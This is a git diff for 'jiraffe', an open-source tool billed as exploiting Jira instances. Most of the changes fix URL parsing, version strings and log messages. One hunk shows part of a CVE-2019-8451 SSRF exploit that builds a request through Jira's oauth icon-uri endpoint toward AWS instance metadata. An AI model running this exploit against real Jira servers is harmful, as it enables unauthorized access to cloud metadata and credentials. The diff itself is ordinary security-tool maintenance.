-
diff --git a/assets/cov.svg b/assets/cov.svg
new file mode 100644
index 0000000..a9be2c5
--- /dev/null
+++ b/assets/cov.svg
@@ -0,0 +1,21 @@
+
+
diff --git a/jiraffe/__init__.py b/jiraffe/__init__.py
index 3123f1d..380481b 100644
--- a/jiraffe/__init__.py
+++ b/jiraffe/__init__.py
@@ -2,4 +2,4 @@
# -*- coding: utf-8 -*-
name = "jiraffe"
-__version__ = "2.0.5"
\ No newline at end of file
+__version__ = "2.0.6"
\ No newline at end of file
diff --git a/jiraffe/exploits.py b/jiraffe/exploits.py
index 9467101..79d099f 100644
--- a/jiraffe/exploits.py
+++ b/jiraffe/exploits.py
@@ -49,7 +49,7 @@ def cve2019_8451(target, ssrf='https://google.com'):
if '"rc":200' in response and res.status_code == 200 and 'set-cookie' in response:
print(style.GREEN("[+] Target found vulnerable to CVE-2019-8451") + style.RESET(''))
print(style.YELLOW("[*] Detecting target's hosting service ...") + style.RESET(''))
- if isaws(target.split('://')[1]): # dirty but works reliably
+ if isaws(target):
print(style.GREEN("[+] Target is hosted on Amazon AWS") + style.RESET(''))
print(style.YELLOW("[*] Testing AWS SSRF payloads ...") + style.RESET(''))
payload = target + "/plugins/servlet/oauth/users/icon-uri?consumerUri=" + AWS_INSTANCE
diff --git a/jiraffe/recon.py b/jiraffe/recon.py
index c7493a3..697d9d8 100644
--- a/jiraffe/recon.py
+++ b/jiraffe/recon.py
@@ -10,7 +10,16 @@
def uparse(target):
url = urlparse(target)
- return url.scheme + "://" + url.netloc + url.path if url.path else "" # BASE URL
+ if url.path:
+ if url.path == "/":
+ print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
+ return url.scheme + "://" + url.netloc + url.path
+ else:
+ return url.scheme + "://" + url.netloc + url.path
+ return
+ else:
+ print("[-] Target URL doesn't seems to be correct.\n\t\tValid Target URL Paths: http(s)://target.com/.../(login.action;/view.action;/viewpage.action;/releaseview.action;/aboutconfluencepage.action;/secure/Dashboard.jspa)")
+ return url.scheme + "://" + url.netloc
def request(target):
UA = "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:15.0) Gecko/20100101 Firefox/15.0.1"
@@ -18,11 +27,11 @@ def request(target):
try:
r = requests.get(target, headers=headers)
except Exception as e:
- print("Problem with the HTTP request.", e, sep="\n")
+ print("[-] Problem with the HTTP request.", e, sep="\n")
if r.status_code != 200:
- print("Something went wrong! (STATUS {})".format(r.status_code))
+ print("[-] Something went wrong! (STATUS {})".format(r.status_code))
if r.status_code == 302:
- print("HTTP request got redirected. Set this instead: " + r.headers['Location'])
+ print("[*] HTTP request got redirected. Set this instead: " + r.headers['Location'])
exit(1) # https://stackoverflow.com/a/2434619
return r, r.text
@@ -37,7 +46,8 @@ def isjira(target):
return False
def isaws(target):
- data = socket.gethostbyaddr(target)
+ target = urlparse(target)
+ data = socket.gethostbyaddr(target.netloc)
if "amazonaws" in str(data):
return True
else:
@@ -48,7 +58,6 @@ def getversion(target): # ENUM #1: Jira version appears to be ____
f_build = '0.0.0' # default
vers = []
final_version = ""
- target = target + urlparse(target).path if "/login.jsp" in urlparse(target).path else target + '/login.jsp'
res, response = request(target)
soup = bs4.BeautifulSoup(response, "html.parser")
try:
diff --git a/setup.py b/setup.py
index 4984541..8f2c931 100644
--- a/setup.py
+++ b/setup.py
@@ -15,7 +15,7 @@
# call to setup()
setup(
name="jiraffe",
- version="2.0.5",
+ version="2.0.6",
description="One stop place for exploiting all Jira instances in your proximity.",
long_description=README,
long_description_content_type="text/markdown",